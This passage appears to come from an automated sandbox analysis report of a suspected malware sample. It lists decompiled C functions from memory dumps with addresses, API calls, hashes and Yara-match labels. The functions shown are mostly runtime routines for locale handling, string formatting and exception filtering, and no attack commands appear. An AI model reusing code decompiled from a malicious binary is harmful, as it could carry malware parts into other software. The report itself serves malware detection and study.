				 *0x460718 = 0 ^  *0x45f014;
				 *(_t28 - 0x1c) = _t15;
				 *(_t28 - 4) = 0xfffffffe;
				E00437C9A();
				return E00429356();
			}





                                            0x00437c29
                                            0x00437c2e
                                            0x00437c37
                                            0x00437c3d
                                            0x00437c4e
                                            0x00437c5a
                                            0x00437c6a
                                            0x00437c71
                                            0x00437c79
                                            0x00437c7e
                                            0x00437c81
                                            0x00437c88
                                            0x00437c94

                                            APIs
                                              • Part of subcall function 00436684: EnterCriticalSection.KERNEL32(-00460500,?,00434066,00000000,0045D580,0000000C,00434021,00000000,?,?,00436922,00000000,?,00438E16,00000001,00000364), ref: 00436693
                                            • EnumSystemLocalesW.KERNEL32(00437BDC,00000001,0045D6A8,0000000C), ref: 00437C5A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                            • String ID:
                                            • API String ID: 1272433827-0
                                            • Opcode ID: 5391c3eb31340b2a7460f20ab6e549405cccb3cfa60e6ed4008abfc4ed647f3d
                                            • Instruction ID: e83dc317618e3f2f88ddaf06541f5fcd4d3d87544171022a03a0cd536c7f4969
                                            • Opcode Fuzzy Hash: 5391c3eb31340b2a7460f20ab6e549405cccb3cfa60e6ed4008abfc4ed647f3d
                                            • Instruction Fuzzy Hash: 67F0AF72A103009FDB50EF68E846B4D37E0EB09725F10906AF400DB2E2C7B89940DF4E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043F9C0, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0043F9C0(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = E00438D61(_t14, __ecx, __edx);
				_t16 =  *((intOrPtr*)(_t20 + 0x54));
				_t22 = _t16 + 2;
				do {
					_t9 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t9 != 0);
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x43f917, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}










                                            0x0043f9cc
                                            0x0043f9d0
                                            0x0043f9d3
                                            0x0043f9d6
                                            0x0043f9d6
                                            0x0043f9d9
                                            0x0043f9dc
                                            0x0043f9f4
                                            0x0043f9f7
                                            0x0043f9fd
                                            0x0043fa03
                                            0x0043fa05
                                            0x00000000
                                            0x0043fa05
                                            0x0043fa0a

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                            • EnumSystemLocalesW.KERNEL32(0043F917,00000001,?,?,?,00440182,00435A94,?,?,?,?,?,00435A94,?,?,?), ref: 0043F9F7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                            • String ID:
                                            • API String ID: 1084509184-0
                                            • Opcode ID: f8aa72a7bcd726e72786d8cf73971c4731203b4855660e675b1bb7f189821c55
                                            • Instruction ID: e728c85737de832c9ad8717faf1300b4289f81eac79e661b00f1a292883fd12b
                                            • Opcode Fuzzy Hash: f8aa72a7bcd726e72786d8cf73971c4731203b4855660e675b1bb7f189821c55
                                            • Instruction Fuzzy Hash: BFF0203AB0024667CB04AB35D809B6BBB94EF86728F06006AEA098B680C6399C42C754
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409947, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00409947(void* __ecx) {
				char _v8;
				void* _t8;
				void* _t12;

				_push(__ecx);
				_t12 = __ecx;
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				E0040207E(_t8, _t12,  &_v8);
				return _t12;
			}






                                            0x0040994a
                                            0x00409951
                                            0x0040995b
                                            0x00409967
                                            0x00409972

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0040CC54,0046103C,004612AC,0046103C,00000000,0046103C,00000000,0046103C,3.1.4 Light), ref: 0040995B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: ba893c8e04b2c034f203a188184ea3258e690f0dfaed86860cb7f6384a647f6a
                                            • Instruction ID: cedd44fe4e836010f81b1308993ff2ff669dbf2f3a83632074262f13b870f0bf
                                            • Opcode Fuzzy Hash: ba893c8e04b2c034f203a188184ea3258e690f0dfaed86860cb7f6384a647f6a
                                            • Instruction Fuzzy Hash: 91D05B3074021C77D510D6C5DC0AEAB779CD701751F0001A6BA04D72C0D9E15E0087D1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004292B1, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004292B1() {

				return SetUnhandledExceptionFilter(E004292BD);
			}



                                            0x004292bc

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000292BD,00428D77), ref: 004292B6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: c1476bf645e3cc2ca9d55a125406a095b5896999d7c4279ddb045cb90a560f0c
                                            • Instruction ID: ea1caf8ae1a30cfd0bbd0152aaa655f014b6eb2b8bd3bf5b6a333c2d210517a1
                                            • Opcode Fuzzy Hash: c1476bf645e3cc2ca9d55a125406a095b5896999d7c4279ddb045cb90a560f0c
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042FCE9, Relevance: 1.5, Strings: 1, Instructions: 214COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E0042FCE9(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00430610(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0042F257(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E004308F3(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0042F257(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E004307A5(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0042F257(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E0043041B(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E004305F8(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00430231(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00430565(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E004305D9(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E004301CE(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0043038B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































                                            0x0042fcee
                                            0x0042fcf1
                                            0x0042fcf5
                                            0x0042fcf8
                                            0x0042fcfc
                                            0x0042fcff
                                            0x0042fd6d
                                            0x0042fd70
                                            0x0042fdbf
                                            0x0042fdbf
                                            0x0042fdc2
                                            0x0042fd2f
                                            0x0042fd31
                                            0x0042fd36
                                            0x0042fd38
                                            0x0042fddd
                                            0x0042fde1
                                            0x0042fdea
                                            0x0042fdef
                                            0x0042fdf0
                                            0x0042fdf4
                                            0x0042fdf6
                                            0x0042fdfb
                                            0x0042fdfe
                                            0x0042fe00
                                            0x0042fe29
                                            0x0042fe29
                                            0x0042fe2c
                                            0x0042fe2f
                                            0x0042fe36
                                            0x0042fe38
                                            0x0042fe3b
                                            0x0042fe3d
                                            0x0042fe41
                                            0x0042fe41
                                            0x0042fe44
                                            0x0042fe4f
                                            0x0042fe4f
                                            0x0042fe51
                                            0x0042fe51
                                            0x0042fe53
                                            0x0042fe59
                                            0x0042fe59
                                            0x0042fe5e
                                            0x0042fe61
                                            0x0042fe6c
                                            0x0042fe6c
                                            0x0042fe6e
                                            0x0042fe6e
                                            0x0042fe79
                                            0x0042fe7d
                                            0x0042fe7d
                                            0x0042fe80
                                            0x0042fe86
                                            0x0042fe88
                                            0x0042fe8b
                                            0x0042fe9b
                                            0x0042fea0
                                            0x0042fea0
                                            0x0042feb5
                                            0x0042feba
                                            0x0042febd
                                            0x0042fec2
                                            0x0042fec5
                                            0x0042fec7
                                            0x0042fec9
                                            0x0042fecc
                                            0x0042fecf
                                            0x0042fedc
                                            0x0042fee1
                                            0x0042fee1
                                            0x0042fecf
                                            0x0042fee8
                                            0x0042feed
                                            0x0042fef0
                                            0x0042fef5
                                            0x0042fef8
                                            0x0042fefa
                                            0x0042ff07
                                            0x0042ff0c
                                            0x0042fefa
                                            0x0042ff0f
                                            0x0042ff12
                                            0x0042ff17
                                            0x0042ff17
                                            0x0042fe63
                                            0x0042fe66
                                            0x00000000
                                            0x00000000
                                            0x0042fe68
                                            0x00000000
                                            0x0042fe68
                                            0x0042fe55
                                            0x0042fe57
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042fe57
                                            0x0042fe46
                                            0x0042fe49
                                            0x00000000
                                            0x00000000
                                            0x0042fe4b
                                            0x00000000
                                            0x0042fe4b
                                            0x0042fe3f
                                            0x0042fe3f
                                            0x0042fe3f
                                            0x00000000
                                            0x0042fe3f
                                            0x0042fe31
                                            0x0042fe34
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042fe34
                                            0x0042fe04
                                            0x0042fe07
                                            0x0042fe09
                                            0x0042fe11
                                            0x0042fe13
                                            0x0042fe1d
                                            0x0042fe1f
                                            0x0042fe21
                                            0x00000000
                                            0x00000000
                                            0x0042fe23
                                            0x0042fe27
                                            0x0042fe27
                                            0x00000000
                                            0x0042fe27
                                            0x0042fe15
                                            0x00000000
                                            0x0042fe15
                                            0x0042fe0b
                                            0x00000000
                                            0x0042fe0b
                                            0x0042fde3
                                            0x00000000
                                            0x0042fde3
                                            0x0042fd3e
                                            0x0042fd3e
                                            0x00000000
                                            0x0042fd3e
                                            0x0042fdc9
                                            0x0042fdc9
                                            0x0042fdcc
                                            0x0042fd9e
                                            0x0042fd9e
                                            0x0042fd9f
                                            0x0042fda1
                                            0x0042fda3
                                            0x00000000
                                            0x0042fda3
                                            0x0042fdce
                                            0x0042fdd1
                                            0x00000000
                                            0x00000000
                                            0x0042fdd7
                                            0x0042fd46
                                            0x0042fd46
                                            0x00000000
                                            0x0042fd46
                                            0x0042fd72
                                            0x0042fdb5
                                            0x00000000
                                            0x0042fdb5
                                            0x0042fd74
                                            0x0042fd77
                                            0x0042fdaa
                                            0x0042fdac
                                            0x00000000
                                            0x0042fdac
                                            0x0042fd79
                                            0x0042fd7c
                                            0x0042fd9a
                                            0x0042fd9a
                                            0x0042fd9a
                                            0x0042fd9a
                                            0x00000000
                                            0x0042fd9a
                                            0x0042fd7e
                                            0x0042fd81
                                            0x0042fd93
                                            0x00000000
                                            0x0042fd93
                                            0x0042fd83
                                            0x0042fd86
                                            0x00000000
                                            0x00000000
                                            0x0042fd8a
                                            0x00000000
                                            0x0042fd8a
                                            0x0042fd01
                                            0x00000000
                                            0x00000000
                                            0x0042fd07
                                            0x0042fd0a
                                            0x0042fd4a
                                            0x0042fd4a
                                            0x0042fd4d
                                            0x0042fd66
                                            0x00000000
                                            0x0042fd66
                                            0x0042fd4f
                                            0x0042fd4f
                                            0x0042fd52
                                            0x00000000
                                            0x00000000
                                            0x0042fd55
                                            0x0042fd58
                                            0x00000000
                                            0x00000000
                                            0x0042fd5a
                                            0x0042fd5d
                                            0x00000000
                                            0x0042fd5d
                                            0x0042fd0c
                                            0x0042fd45
                                            0x00000000
                                            0x0042fd45
                                            0x0042fd11
                                            0x00000000
                                            0x00000000
                                            0x0042fd1a
                                            0x00000000
                                            0x00000000
                                            0x0042fd1f
                                            0x00000000
                                            0x00000000
                                            0x0042fd24
                                            0x00000000
                                            0x00000000
                                            0x0042fd2d
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 15fc0b610955a59706647b089866c2d85d114a648f37a763adeff41b23666f93
                                            • Instruction ID: 249d8d328e5f9bc30140603b4afe27f37519e33ea285676be359c1c0ca43253a
                                            • Opcode Fuzzy Hash: 15fc0b610955a59706647b089866c2d85d114a648f37a763adeff41b23666f93
                                            • Instruction Fuzzy Hash: A951462131062997DB398568B565BBF63B59B42304FC8093BE543C7392D60DED0F876E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042FF18, Relevance: 1.5, Strings: 1, Instructions: 214COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E0042FF18(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00430610(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0042F283(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E0043097D(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0042F283(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E0043084C(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0042F283(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E0043041B(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E004305F8(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00430231(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00430565(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E004305D9(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E004301CE(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0043038B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































                                            0x0042ff1d
                                            0x0042ff20
                                            0x0042ff24
                                            0x0042ff27
                                            0x0042ff2b
                                            0x0042ff2e
                                            0x0042ff9c
                                            0x0042ff9f
                                            0x0042ffee
                                            0x0042ffee
                                            0x0042fff1
                                            0x0042ff5e
                                            0x0042ff60
                                            0x0042ff65
                                            0x0042ff67
                                            0x0043000c
                                            0x00430010
                                            0x00430019
                                            0x0043001e
                                            0x0043001f
                                            0x00430023
                                            0x00430025
                                            0x0043002a
                                            0x0043002d
                                            0x0043002f
                                            0x00430058
                                            0x00430058
                                            0x0043005b
                                            0x0043005e
                                            0x00430065
                                            0x00430067
                                            0x0043006a
                                            0x0043006c
                                            0x00430070
                                            0x00430070
                                            0x00430073
                                            0x0043007e
                                            0x0043007e
                                            0x00430080
                                            0x00430080
                                            0x00430082
                                            0x00430088
                                            0x00430088
                                            0x0043008d
                                            0x00430090
                                            0x0043009b
                                            0x0043009b
                                            0x0043009d
                                            0x0043009d
                                            0x004300a8
                                            0x004300ac
                                            0x004300ac
                                            0x004300af
                                            0x004300b5
                                            0x004300b7
                                            0x004300ba
                                            0x004300ca
                                            0x004300cf
                                            0x004300cf
                                            0x004300e4
                                            0x004300e9
                                            0x004300ec
                                            0x004300f1
                                            0x004300f4
                                            0x004300f6
                                            0x004300f8
                                            0x004300fb
                                            0x004300fe
                                            0x0043010b
                                            0x00430110
                                            0x00430110
                                            0x004300fe
                                            0x00430117
                                            0x0043011c
                                            0x0043011f
                                            0x00430124
                                            0x00430127
                                            0x00430129
                                            0x00430136
                                            0x0043013b
                                            0x00430129
                                            0x0043013e
                                            0x00430141
                                            0x00430146
                                            0x00430146
                                            0x00430092
                                            0x00430095
                                            0x00000000
                                            0x00000000
                                            0x00430097
                                            0x00000000
                                            0x00430097
                                            0x00430084
                                            0x00430086
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00430086
                                            0x00430075
                                            0x00430078
                                            0x00000000
                                            0x00000000
                                            0x0043007a
                                            0x00000000
                                            0x0043007a
                                            0x0043006e
                                            0x0043006e
                                            0x0043006e
                                            0x00000000
                                            0x0043006e
                                            0x00430060
                                            0x00430063
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00430063
                                            0x00430033
                                            0x00430036
                                            0x00430038
                                            0x00430040
                                            0x00430042
                                            0x0043004c
                                            0x0043004e
                                            0x00430050
                                            0x00000000
                                            0x00000000
                                            0x00430052
                                            0x00430056
                                            0x00430056
                                            0x00000000
                                            0x00430056
                                            0x00430044
                                            0x00000000
                                            0x00430044
                                            0x0043003a
                                            0x00000000
